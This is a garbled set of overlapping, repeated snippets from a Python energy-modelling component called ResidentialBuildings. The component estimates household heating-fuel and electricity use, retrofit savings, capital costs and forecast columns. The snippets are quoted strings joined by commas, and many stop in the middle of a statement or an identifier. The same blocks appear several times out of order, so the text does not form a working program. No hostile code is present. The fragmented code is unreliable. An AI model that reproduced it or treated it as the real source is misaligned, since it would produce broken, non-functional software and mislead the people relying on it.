wood_price =", "the potential improvements to heating efficiency of residential buildings (homes). Consumption and savings", "amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted", "Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption", "Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential:", "range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed", "see information on Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics", "Energy, and Internal Rate of Return will all be calculated. There must be", "= np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area *", "self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg", "aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency", "(Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating", "has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating", "Attributes ---------- init_HH : int estimated households for first year of project \"\"\"", "calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for a house. Attributes", "+ \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self):", "years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\", "electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption", "project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the difference in", "* \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption", "heating efficiency of residential buildings (homes). Consumption and savings are based on the", "run : bool True in the component runs to completion, False otherwise reason", "components, optional prerequisite component data this component has no prerequisites leave empty Attributes", "avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\"", "= (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\", "r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption", "community forecast for estimating future values initial value: forecast cd : dictionary general", "self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities()", "= df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption", "value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH()", "from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from", "\"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years,", "optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics", "self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'],", "self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes", "Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\":", "* gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years", "self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\",", "(Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating", "= self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI =", "a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH", "error/warning messages prerequisites : dictionary of components, optional prerequisite component data \"\"\" self.diagnostics", "= np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP)", "Houses that can be retrofit savings_HF : float savings in heating oil consumption", "Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year)", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"])", "self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption", "consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption", "\"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years,", "community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH =", "(self): \"\"\"calculate annual electric savings created by the project Attributes ---------- annual_electric_savings :", "\"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\",", "def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project Attributes ----------", "self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self,", "= 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\" )", "see information on CommunityData Object aaem.forecast : forecast module, see information on Forecast", "= b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP", "fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life]", "= community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]:", "Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel", "fuel type. Attributes ---------- init_HF : float initial heating oil consumption init_wood :", "forecast : forecast community forecast for estimating future values initial value: forecast cd", "\\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption", "Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost", "\"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption", "decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit", "Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar", "consumption savings_LP : float savings in propane consumption savings_kWh : float savings in", "= \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption =", "= rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"])", "(self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of", "of components, optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics ==", "Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\",", "each home is also calculated. Parameters ---------- community_data : CommunityData CommunityData Object for", "Object \"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites = {}):", "Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost", "\"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\",", "fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption :", "r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost", "[gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption)", ": diagnostics for tracking error/warning messages initial value: diag or new diagnostics object", "also -------- aaem.community_data : community data module, see information on CommunityData Object aaem.forecast", "* constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] ==", "df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year)", "\"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\",", "CommunityData Object for a community forecast : Forecast forecast for a community diagnostics", "(self): \"\"\"Calculate the initial consumption for each fuel type. Attributes ---------- init_HF :", "gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity", "and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model", ": np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption :", "1 and tag[1] != 'residential': self.was_run = False self.reason = \"Not a residential", "to heating efficiency of residential buildings (homes). Consumption and savings are based on", "cf: float conversion factor Returns ------- float: fuel consumed for a type of", "rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~", "HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt,", "Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\",", "if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def", "+\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH,", "s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption", "np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium'])", "(homes). Consumption and savings are based on the number of units that have", ": float a # of houses cf: float conversion factor Returns ------- float:", "from aaem.diagnostics import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN", "cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price']", "\"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost =", "gas fuel consumption savings_LP : float savings in propane consumption savings_kWh : float", "normal run variables. See note on accepted scalers Attributes ---------- run : bool", "\"\"\"Get total fuel saved. Returns ------- float the total fuel saved in gallons", "Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\",", "buildings HH : float a # of houses cf: float conversion factor Returns", "'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if", "Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All", "coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community", "= self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption *", "self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs", "= self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption", "for failure if run == False Notes ----- Accepted scalers: capital costs. \"\"\"", "(cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric", "(gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"])", "self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price", "Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year)", "+ self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(),", "self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self):", "Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year)", "(MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]]", "np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI", "= self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print", "Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel", "Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year)", "* wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh", "in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for", "to adjust normal run variables. See note on accepted scalers Attributes ---------- run", "= self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES", "of Return will all be calculated. There must be a known Heat Recovery", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt", "= None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData", "avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI # the", "- r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost", "Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\":", "Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating", "\"\"\" # 500 average energy use, 12 months in a year. That's where", "self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel", "improvements as a percentage of the pre-retrofit consumption, and the forecasted price of", ": np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\"", "error/warning messages prerequisites : dictionary of components, optional prerequisite component data this component", "* LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self):", "(1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption", "households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val =", "'community' section of community_data comp_specs : dictionary component specific data for a community.", "(MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating", "self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption", "self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf)", "rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg", "community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if", "- \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity", "is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction *", "self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop)", "self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0]", "amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total,", "Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH = self.households", "self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total", "s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), },", "prerequisites : dictionary of components, optional prerequisite component data this component has no", "the difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life)", "\"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost", "## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings)", "accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH", "'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop", "self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\", "the initial consumption for each fuel type. Attributes ---------- init_HF : float initial", "(kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential:", "community_data : CommunityData CommunityData Object for a community forecast : Forecast forecast for", "Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass", "Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption", "= float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns =", "tracking error/warning messages initial value: diag or new diagnostics object forecast : forecast", "Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con", "total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH", "\"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential:", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted))", "/ 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF)", "messages initial value: diag or new diagnostics object forecast : forecast community forecast", "initial heating cordwood consumption init_gas : float initial natural gas fuel consumption init_LP", "post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float", "b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year)", "gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years =", "init_HH : int estimated households for first year of project \"\"\" val =", "#~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices()", "Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost", "year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price", ": float average electric consumption per household (kWh/year). >= 6000 \"\"\" # 500", "Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year)", "Heat Recovery project for this component to run. Parameters ---------- scalers : dictionary", "= rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit", "def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost :", "proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption -", "self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year'])", "Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating", "aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\" def __init__ (self,", "Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel", "constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of", "\\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost", "---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood", "Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\":", "Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year)", "float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def", "\"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\":", "- r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost", "tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run", "self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the", "= self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost", "Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\",", "gas price'] else: HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price", "or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to", "= self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption =", "community forecast : Forecast forecast for a community diagnostics : diagnostics, optional diagnostics", "(gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential:", "baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption :", "df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname", "Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit", "HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\", "EUI # the one in each of these function calls is an identity", "(1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate", "self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price']", "\\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\", "[mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv in", "if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name =", ".ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate", "self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the", "np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF", "houses cf: float conversion factor Returns ------- float: fuel consumed for a type", "def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float total", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt", "Attributes ---------- opportunity_HH 